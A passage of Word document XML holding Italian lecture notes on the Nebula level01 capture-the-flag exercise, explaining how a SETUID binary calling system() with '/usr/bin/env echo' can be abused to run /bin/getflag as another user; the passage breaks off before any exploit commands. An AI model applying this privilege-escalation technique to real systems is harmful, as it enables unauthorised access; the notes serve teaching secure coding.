        <w:t xml:space="preserve">la chiediamo al legittimo proprietario (che non ce la darà mai)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">la forziamo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="724"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Come procedere?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">L'utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">level01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">può accedere solamente alle directory:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/level01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">All’interno di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/home/flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> è presente l’eseguibile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">flag01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">(utente: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">flag01, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">gruppo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">level01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">con SETUID settato:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">è eseguibile e permette di ottenere i privilegi di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">è eseguibile dagli utenti del gruppo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">level01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Idea:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> provocare indirettamente (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">iniettare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">) l'esecuzione del binario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/getflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">,sfruttando il binario</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/flag01/flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Conseguenza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/getflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> è eseguito come utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="724"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Come fare?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Come si inietta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/getflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/home/flag01/flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">?</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highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Il programma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">level1.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> svolge le seguenti operazioni:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Imposta tutti gli user ID al valore effettivo (elevazione dell'utente a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">flag01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Imposta tutti i group ID al valore effettivo (elevazione del gruppo a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">level01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Esegue un comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">La funzione di libreria </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">system()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> esegue un comando di shell, passato come argomento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Dalla sezione NOTES di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">system()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="734"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">"Do not use system() from a program with set-user-ID or set-groupID privileges, because strange values for some environment variables might be used to subvert system integrity. […]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">MAI eseguire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">system()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> con il SETUID bit acceso, poiché giocando con le variabili di ambiente si può violare la sicurezza del programma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Nell'esempio level1.c, system() esegue il comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/env echo and now what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
